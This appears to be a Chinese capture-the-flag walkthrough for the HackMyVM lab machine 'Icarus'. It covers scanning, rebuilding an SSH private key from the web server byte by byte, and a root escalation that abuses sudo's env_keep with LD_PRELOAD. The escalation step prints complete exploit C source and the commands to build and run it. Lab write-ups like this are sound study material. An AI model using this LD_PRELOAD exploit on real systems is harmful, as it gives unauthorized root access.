靶机信息

下载地址:

https://hackmyvm.eu/machines/machine.php?vm=Icarus
网盘链接：https://pan.baidu.com/s/1OjMwuU6F1V98x2UnLz-eHA?pwd=xcvx

靶场: HackMyVm.eu

靶机名称: Icarus

难度: 简单

发布时间: 2020年10月31日

提示信息:

无

目标: user.txt和root.txt

实验环境

攻击机:VMware kali 10.0.0.3 eth0桥接互联网，eth1桥接vbox-Host-Only

靶机:Vbox linux IP自动获取 网卡host-Only

信息收集

扫描主机

扫描局域网内的靶机IP地址

fping -ag 10.0.0.0/24 2>/dev/null

扫描到主机地址为10.0.0.169

扫描端口

扫描靶机开放的服务端口

sudo nmap -sC -sV -p- 10.0.0.169 -oN nmap.log

扫描到22和80端口开放，先来看看80端口

Web渗透

访问后是一个登录功能，随意测试几个弱密码都无法登录。做个目录扫描看看

gobuster dir -u http://10.0.0.169 -w ~/HackTools/Dict/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt,html

扫描后发现a目录下有些内容，访问看看

访问后弹出一个下载框，到命令行将他下载下来

wget http://10.0.0.169/a
cat a

下载后查看内容，看起来像是一个字典，与之前目录扫描很相似，目录扫描时x开头的都会返回200，当做目录访问后会提示下载，下载后每个文件只有一个字节，把这些返回的内容连接起来

for i in $(cat a); do curl "http://10.0.0.169/$i" >> out; done

看一下最终结果

cat out

拿到key文件，先保存起来，再将内容拿去做base64解码试试能不能获取到用户账号

vi key

拿到账号，登录SSH

ssh [email protected] -i key

登录成功，来找找敏感信息

ls
cat user.txt

拿到user.txt，继续找

sudo -l

发现可以使用root用户身份执行id命令，并且发现env_keep环境变量

sudo /usr/bin/id

利用LD_PRELOAD路径劫持提权，验证一下。

1。创建payload

vi exp.c

#include <stdio.h>
#include <sys/types.h>
#include <stdlib.h>
void _init() {
    unsetenv("LD_PRELOAD");
    setgid(0);
    setuid(0);
    system("/bin/bash");
}

2。生成动态链接库

gcc -fPIC -shared exp.c -o exp.so -nostartfiles

3。执行劫持变量提权

sudo LD_PRELOAD=/$PWD/exp.so id

提权成功，来找找flag

cat /root/root.txt

拿到root.txt，游戏结束

原文始发于微信公众号（伏波路上学安全）：渗透测试靶机练习No.94 Icarus